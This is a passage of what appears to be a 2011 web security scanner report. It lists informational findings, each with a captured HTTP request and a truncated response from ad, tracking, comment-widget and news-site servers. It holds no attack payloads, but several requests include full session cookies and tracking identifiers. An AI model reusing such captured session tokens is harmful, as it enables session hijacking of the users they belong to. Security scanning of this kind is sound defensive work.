Cookie: PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 28 Sep 2010 13:30:45 GMT
ETag: "b283ae-664-da23cb40"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:01:02 GMT
Connection: close
Content-Length: 1636

<html>
<head>
<link href="http://akamai-static.nme.com/themes/default/css/nme_radio.css" rel="stylesheet" type="text/css" media="screen, print" />
<script type="text/javascript" src="nmeradionp.js"
...[SNIP]...
24.16. http://media.adfrontiers.com/pq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.adfrontiers.com
Path:   /pq

Request

GET /pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t HTTP/1.1
Host: media.adfrontiers.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tc=1; af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 01 Jan 2000 00:00:00 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"; Version=1; Domain=media.adfrontiers.com; Max-Age=2592000; Path=/
Content-Type: text/html
Content-Length: 771
Date: Mon, 09 May 2011 14:00:09 GMT
Connection: close

<html><head>
<title>Adv.com 2010 - FCap 3/24 728x90</title>
</head><body marginwidth=0 marginheight=0 leftmargin=0 topmargin=0 style="background-color:transparent">
<script type='text/javascript'>
v
...[SNIP]...
24.17. http://mediacdn.disqus.com/1304703476/build/system/def.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/def.html

Request

GET /1304703476/build/system/def.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:08 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2794959935 2794959391
Cache-Control: max-age=2370989
Expires: Mon, 06 Jun 2011 00:37:47 GMT
Date: Mon, 09 May 2011 14:01:18 GMT
Connection: close
Content-Length: 26548

<!DOCTYPE html>

<html>
<script>
document.domain = 'disqus.com';

var urls = {
sigma: "http://sigma.disqus.com/sigma.html",
xdm: "http://mediacdn.disqus.com/1304703476/html/xdm
...[SNIP]...
24.18. http://mediacdn.disqus.com/1304703476/build/system/reply.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/reply.html

Request

GET /1304703476/build/system/reply.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:02 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2794963821 2794959540
Cache-Control: max-age=2370964
Expires: Mon, 06 Jun 2011 00:37:30 GMT
Date: Mon, 09 May 2011 14:01:26 GMT
Connection: close
Content-Length: 33911


<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title></title>


<style type="text/css">
html,body,div,span,applet,object,iframe,h1,h2,h3,h
...[SNIP]...
24.19. http://mediacdn.disqus.com/1304703476/build/system/upload.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/upload.html

Request

GET /1304703476/build/system/upload.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:03 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2794960096
Cache-Control: max-age=2370975
Expires: Mon, 06 Jun 2011 00:37:40 GMT
Date: Mon, 09 May 2011 14:01:25 GMT
Connection: close
Content-Length: 13708

<html>
<head>
<meta charset="utf-8">
<title></title>


<style type="text/css">
html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,a
...[SNIP]...
24.20. http://ping.chartbeat.net/ping  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.chartbeat.net
Path:   /ping

Request

GET /ping?h=thevine.com.au&p=%2Fmusic%2Fblogs%2Fmusic-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&u=aewfxpn1kz4cfqjz&d=thevine.com.au&g=7930&n=1&c=9&x=0&y=3519&w=968&j=270&R=0&W=0&I=1&b=76071&t=355bo5p4ft4ws74a&_ HTTP/1.1
Host: ping.chartbeat.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Referrer data required.
Server: nginx/0.7.67
Date: Mon, 09 May 2011 14:11:13 GMT
Content-Type: text/html
Connection: close
Content-Length: 146

<HTML><HEAD>
<TITLE>500 Referrer data required.</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>
24.21. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=64 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:00:14 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 13:59:54 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304949614+ \"5\": 1304340362+ \"4\": 1304340367}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:14 GMT; Path=/
Content-Length: 508
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://r.nexac.com/e/getdata.xgi?dt=fi&fn=adrider&pkey=tubw72p3ncbzv&repequal=-&reppipe=%26code%3D","javascript"
...[SNIP]...
24.22. http://uac.advertising.com/wrapper/aceUACping.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uac.advertising.com
Path:   /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ; F1=Bg28H3kAAAAAYm1CAEAAgEABAAAABAAAAEAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2CkdKAgj1G!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Mon, 09 May 2011 14:40:12 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:19 GMT
Connection: close
Content-Length: 2793

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...
24.23. http://wd.sharethis.com/api/getCount2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 246

stButtons.processCB({"url":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509%2C0%2C6839926.story","email":9,"total":9,"ourl":"http:\/\/www.orlandosentinel.com\/business\/os-c
...[SNIP]...
24.24. http://widgets.surphace.com/partner/omniture/sphereomni_api.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel&evt=fireSphereOmInitAction&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web23
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11019
Date: Mon, 09 May 2011 13:59:58 GMT
X-Varnish: 730030070 730030036
Age: 1
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();

...[SNIP]...
24.25. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

Request

GET /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3qCOBQmN0yUv6WrF--lZoc3dRfuweNq9qe4Bp0O5v0HfEOi0vh6R2kg

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:59 GMT
Connection: close
Set-Cookie: /BC3=.P_d.; path=/
Set-Cookie: /SO=:201:; path=/
Set-Cookie: /PC=0; path=/; expires=Mon, 16-May-2011 14:00:59 GMT
Set-Cookie: /SC=0-2vc.1; path=/
Content-Length: 1393


document.write('<IFR'+'AME SRC="http://ad.doubleclick.net/adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI
...[SNIP]...
24.26. http://www.ccnow.com/cgi-local/cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/cart.cgi

Request

GET /cgi-local/cart.cgi?asmakit_shopcart_http://asthmatickitty.com/closefancybox.php HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:24 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Content-Type: text/html
Content-Length: 144

<br><center><table border=1 cellspacing=0 cellpadding=10><tr align=center><td>Server is busy; please try again later.</td></tr></table></center>
24.27. https://www.ccnow.com/cgi-local/cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Request

GET /cgi-local/cart.cgi?asmakit_AKR213_http://asthmatickitty.com/closefancybox.php HTTP/1.1
Host: www.ccnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.5.10.1304949980; oudelay=1304950305; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206;

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:24 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Connection: close
Content-Type: text/html
Content-Length: 144

<br><center><table border=1 cellspacing=0 cellpadding=10><tr align=center><td>Server is busy; please try again later.</td></tr></table></center>
24.28. http://www.floridatoday.com/odygel/lib/userauth/content/login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/login.html

Request

GET /odygel/lib/userauth/content/login.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 22:45:32 GMT
Accept-Ranges: bytes
ETag: "08e11cf1685cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 2828

   <div class="ody-login-box clearfix">
       <a><div id="ody-login-close" class="ody-close"></div></a>
       <div class="ody-title">Log In<span class="ody-orsignup" id="ody-login-signup" >or&nbsp;<a>Sign Up<
...[SNIP]...
24.29. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/signup.html

Request

GET /odygel/lib/userauth/content/signup.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
